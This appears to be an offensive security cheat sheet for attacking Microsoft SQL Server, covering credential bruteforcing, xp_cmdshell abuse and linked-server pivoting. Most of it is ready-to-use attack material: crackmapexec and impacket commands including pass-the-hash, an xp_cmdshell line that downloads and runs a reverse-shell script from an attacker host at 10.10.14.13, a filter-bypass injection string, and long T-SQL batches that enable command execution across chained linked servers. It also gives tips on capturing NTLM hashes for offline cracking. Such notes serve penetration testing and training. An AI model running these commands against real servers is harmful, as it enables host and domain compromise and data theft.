Notes


Ports
1433 TCP (default instance; named instances get a dynamic port, found via the Browser service)
1434 UDP (SQL Server Browser, instance and port discovery)

Service Description
The default instance of Microsoft SQL Server listens on TCP/1433 (named instances use dynamic ports). Clients speak the TDS protocol, which carries authentication (Windows auth via NTLM or Kerberos, or SQL logins), queries, and administrative procedures. UDP/1434 is the SQL Server Browser service, which answers discovery requests with the instance names and TCP ports present on the host.

SQL Auth Exposure

When the server runs in Mixed Mode, SQL logins (sa, application accounts) are accepted alongside Windows auth. Weak, default, or reused passwords on these logins are a frequent misconfiguration, and SQL login passwords are often recoverable from application config files and connection strings.


Attacks


Weak Credentials / SQL Auth
Mixed Mode is common. SQL logins are not locked out by default (lockout only applies to logins created with CHECK_POLICY = ON, which ties them to the Windows account lockout policy), so sa and application logins can often be bruteforced. Failed logins are written to the SQL error log (error 18456) under the default audit setting, so the attempts are visible to defenders who read it.

xp_cmdshell Abuse
If enabled (or if the login can enable it, which requires sysadmin or ALTER SETTINGS), xp_cmdshell runs OS commands in the context of the SQL Server service account for sysadmin callers, or of the xp_cmdshell proxy account for other logins granted it. A service account running as LocalSystem or as a privileged domain account turns this into a direct host or domain compromise.

Linked Server Pivoting
Linked servers configured with a fixed remote login (often sa) let any local login run queries on the remote host as that account, via OPENQUERY or EXEC ... AT. Chains of such links allow lateral movement between MSSQL hosts, and the remote end often has, or allows enabling, xp_cmdshell.


Tools & Exploits


Enumeration


nmap

# ms-sql-info and ms-sql-ntlm-info work unauthenticated; ms-sql-config and ms-sql-dump-hashes need a login passed via script args
nmap -p1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-config,ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=<pass> <target>

Metasploit

use auxiliary/scanner/mssql/mssql_ping
use auxiliary/admin/mssql/mssql_enum
use auxiliary/scanner/mssql/mssql_login

crackmapexec

# sa is a SQL login, not a domain account: use --local-auth
cme mssql <target> -u sa -p 'password123' --local-auth
cme mssql <target> -u <user> -p <pass> -q "SELECT name FROM master.dbo.sysdatabases;"
# domain (Windows) auth, OS command via xp_cmdshell
cme mssql <target> -d <domain> -u <user> -p <pass> -x "whoami"
# pass-the-hash, PowerShell command
cme mssql <target> -d <domain> -u <user> -H <hash> -X '$PSVersionTable'

sqsh / tsql / mssql-cli

sqsh -U sa -P password -S <target>
> EXEC master..xp_cmdshell 'whoami'
> go

impacket-mssqlclient

# SQL login (no domain prefix)
mssqlclient.py user:'Password123'@<target>
# Windows auth (NTLM); -port for named instances on non-default ports
impacket-mssqlclient -port <port> domain/username:password@target -windows-auth
# helpers at the client prompt: enable_xp_cmdshell, xp_cmdshell <cmd>, enum_links and use_link <name> (newer impacket)

Exploitation or Post-Enum


Enable xp_cmdshell

-- needs sysadmin (ALTER SETTINGS); the change is written to the SQL error log
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Test/Abuse xp_cmdshell

EXEC master..xp_cmdshell 'whoami'
-- 10.10.14.13:8000 is the attacker's web server hosting rev.ps1
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

Bypass Filters (injection context)

-- reaches xp_cmdshell when the literal keyword is blocked by a WAF or input filter
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping <collab-url>' --

Check if Enabled

-- value_in_use = 1 means enabled; value = 1 with value_in_use = 0 means set but RECONFIGURE not yet run
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
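The steps above (check, enable, run, inspect) as one T-SQL batch. This is an added example, not code from the original notes: it records the current setting so it can be restored, captures xp_cmdshell output in a temp table (the useful form when the only channel back is a query result, e.g. an injection point), and shows which account the command actually ran as. It assumes a sysadmin login; 'whoami /all' is an illustrative command.

```sql
-- Added example: xp_cmdshell end-to-end with output capture and cleanup.
-- Assumes the current login is sysadmin (ALTER SETTINGS is required for sp_configure).

-- 1. Record the current state so it can be restored afterwards.
DECLARE @was_enabled INT;
SELECT @was_enabled = CAST(value_in_use AS INT)
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Enable only if needed. Both changes are logged in the SQL error log.
IF @was_enabled = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- 3. Capture the command output in a table instead of relying on an interactive
--    result set: INSERT ... EXEC works with xp_cmdshell because it returns one
--    NVARCHAR column per output line (a trailing NULL row marks the end).
IF OBJECT_ID('tempdb..#out') IS NOT NULL DROP TABLE #out;
CREATE TABLE #out (line NVARCHAR(4000) NULL);
INSERT INTO #out EXEC master..xp_cmdshell 'whoami /all';
SELECT line FROM #out WHERE line IS NOT NULL;

-- 4. Whose context was that? sysadmin callers run as the SQL Server service
--    account; other logins run as the proxy credential, if one is configured.
SELECT name, credential_identity
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 5. Put the setting back the way it was.
IF @was_enabled = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END;
DROP TABLE #out;
```

If the 'whoami /all' output shows the service account is LocalSystem or a domain account, every later xp_cmdshell call runs with those rights; if it shows a low-privileged proxy account, the calling login is not sysadmin and step 2 would have failed anyway.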

Extract Information

SELECT @@version;                      -- build and OS, useful for matching known issues
SELECT DB_NAME();                      -- current database
SELECT name FROM master..sysdatabases; -- all databases on the instance
SELECT is_srvrolemember('sysadmin');   -- 1 means the current login is sysadmin
EXEC sp_linkedservers;                 -- linked servers available for pivoting
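The linked-server pivot from the Attacks section, worked through in T-SQL. This is an added example, not code from the original notes: it lists each link together with the login mapping (the part sp_linkedservers does not show), runs queries on the remote side with OPENQUERY and EXEC ... AT, enumerates the next hop, and enables xp_cmdshell across the link. LINK1 and LINK2 are placeholder linked-server names; the steps that change configuration on the remote host assume the mapped remote login is sysadmin there and that RPC Out is enabled on the link.

```sql
-- Added example: enumerate linked servers and their login mappings, then pivot.
-- LINK1 / LINK2 are placeholders for real linked-server names.

-- 1. Which links exist and who do we become on the remote side?
--    local_principal_id = 0 is the default mapping that applies to every login;
--    uses_self_credential = 1 forwards our own login, otherwise remote_name
--    (often 'sa') is used for everyone.
SELECT s.name,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,              -- needed for EXEC ... AT
       l.uses_self_credential,
       l.remote_name,
       CASE WHEN l.local_principal_id = 0 THEN '(all other logins)'
            ELSE p.name END AS local_login
FROM sys.servers s
LEFT JOIN sys.linked_logins l     ON l.server_id = s.server_id
LEFT JOIN sys.server_principals p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1;

-- 2. Pass-through query with OPENQUERY: works without RPC Out, but only for
--    statements that return a result set. Quotes inside the string are doubled.
SELECT *
FROM OPENQUERY(LINK1, 'SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')');

-- 3. Same via EXEC ... AT: needs RPC Out, but accepts any statement, including
--    sp_configure and xp_cmdshell.
EXEC ('SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT LINK1;

-- 4. Enumerate the remote host's own links to find the next hop.
EXEC ('SELECT name, data_source, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1') AT LINK1;

-- 5. Enable xp_cmdshell on the remote host and run a command there
--    (only if step 2/3 showed the mapped login is sysadmin on LINK1).
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT LINK1;
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT LINK1;
EXEC ('EXEC master..xp_cmdshell ''whoami''') AT LINK1;

-- 6. Two hops: nest EXEC ... AT. Each nesting level doubles the quotes again.
EXEC ('EXEC (''SELECT @@SERVERNAME, SYSTEM_USER'') AT LINK2') AT LINK1;
```

Step 1 is the one to run first: a link whose default mapping is a fixed sysadmin account is the classic misconfiguration, because any login on the local instance, including a low-privileged application login obtained by injection, inherits that account on the remote host. Links that forward the caller's own credential only help if that identity already has rights on the remote side.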

Wireshark Analysis Tips


Filters

tcp.port == 1433

What to look for:

  • Login attempts (TDS7 Login packets) and the server's auth responses (Login ACK, or an error token such as 18456 for a failed login)
  • SQL batch text and result rows in the clear when encryption was not negotiated during the PRELOGIN exchange (batch text is UCS-2LE, so it shows as spaced-out characters in a raw view)
  • NTLM handshake carried in SSPI messages over TDS for Windows auth; the challenge/response pair can be extracted for offline cracking

References